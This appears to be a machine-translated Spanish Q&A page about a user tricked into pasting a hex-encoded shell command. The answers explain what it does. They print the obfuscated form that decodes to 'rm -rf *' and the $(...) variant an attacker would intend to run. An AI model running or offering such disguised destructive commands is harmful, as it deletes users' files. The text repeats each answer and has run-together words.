Me engañaron para que copiara y pegara un comando, ¿me hizo daño?

Question 1

No, no hizo nada, solo estuvo a punto.

El paréntesis le dice a bash (el shell) que ejecute el contenido en un subshell (lo cual no tiene sentido). El comando ejecutado echo 726d202d7266202a | xxd -r -pno hace nada excepto mostrar el siguiente texto en la pantalla, "rm -rf *". si tuvieracorrerese texto como un comando, en lugar de simplemente mostrar el texto en la pantalla, estaría en problemas. De todas formas, que esta sea una lección gratuita para no ejecutar comandos de Internet que no entiendas.

Answer

No, no hizo nada, solo estuvo a punto.

El paréntesis le dice a bash (el shell) que ejecute el contenido en un subshell (lo cual no tiene sentido). El comando ejecutado echo 726d202d7266202a | xxd -r -pno hace nada excepto mostrar el siguiente texto en la pantalla, "rm -rf *". si tuvieracorrerese texto como un comando, en lugar de simplemente mostrar el texto en la pantalla, estaría en problemas. De todas formas, que esta sea una lección gratuita para no ejecutar comandos de Internet que no entiendas.

Question 2

Con el espíritu de "es mejor enseñarle a pescar a un hombre que darle un pescado", te aconsejo que escribas en la terminalman xxd(y sí, soy otra persona más que te dice que ingreses algo en la terminal... pero debes reconocer el mancomando como seguro).

Si no estás familiarizado con echo,deberías comprobarlo también. Básicamente, el comando que enumeró "hace eco" de la cadena en la salida estándar.

Sin embargo, la tubería |canaliza esa salida estándar a la entrada estándar del xxdcomando, que en este caso está configurada para convertir una cadena en hexadecimal a una entrada con formato normal.

Entonces la respuesta corta es: no, no eliminó nada. Pero resonó rm -rf *en tu pantalla, lo que debe haberte dado un poco de escalofrío :-)

Answer

Con el espíritu de "es mejor enseñarle a pescar a un hombre que darle un pescado", te aconsejo que escribas en la terminalman xxd(y sí, soy otra persona más que te dice que ingreses algo en la terminal... pero debes reconocer el mancomando como seguro).

Si no estás familiarizado con echo,deberías comprobarlo también. Básicamente, el comando que enumeró "hace eco" de la cadena en la salida estándar.

Sin embargo, la tubería |canaliza esa salida estándar a la entrada estándar del xxdcomando, que en este caso está configurada para convertir una cadena en hexadecimal a una entrada con formato normal.

Entonces la respuesta corta es: no, no eliminó nada. Pero resonó rm -rf *en tu pantalla, lo que debe haberte dado un poco de escalofrío :-)

Question 3

El atacante probablemente quiso que lo pegaras $(echo 726d202d7266202a | xxd -r -p)en tu shell. xxd decodificaría 726d202d7266202a en rm -rf *, que luego se ejecutaría.

Answer

El atacante probablemente quiso que lo pegaras $(echo 726d202d7266202a | xxd -r -p)en tu shell. xxd decodificaría 726d202d7266202a en rm -rf *, que luego se ejecutaría.

Question 4

Si le preocupa que alguien esté molestando su sistema de archivos, entonces chrootestá a su disposición. chroot /random/directoryluego ejecuta el comando.

Answer

Si le preocupa que alguien esté molestando su sistema de archivos, entonces chrootestá a su disposición. chroot /random/directoryluego ejecuta el comando.

Me engañaron para que copiara y pegara un comando, ¿me hizo daño?

Respuesta1

Respuesta2

Respuesta3

Respuesta4

información relacionada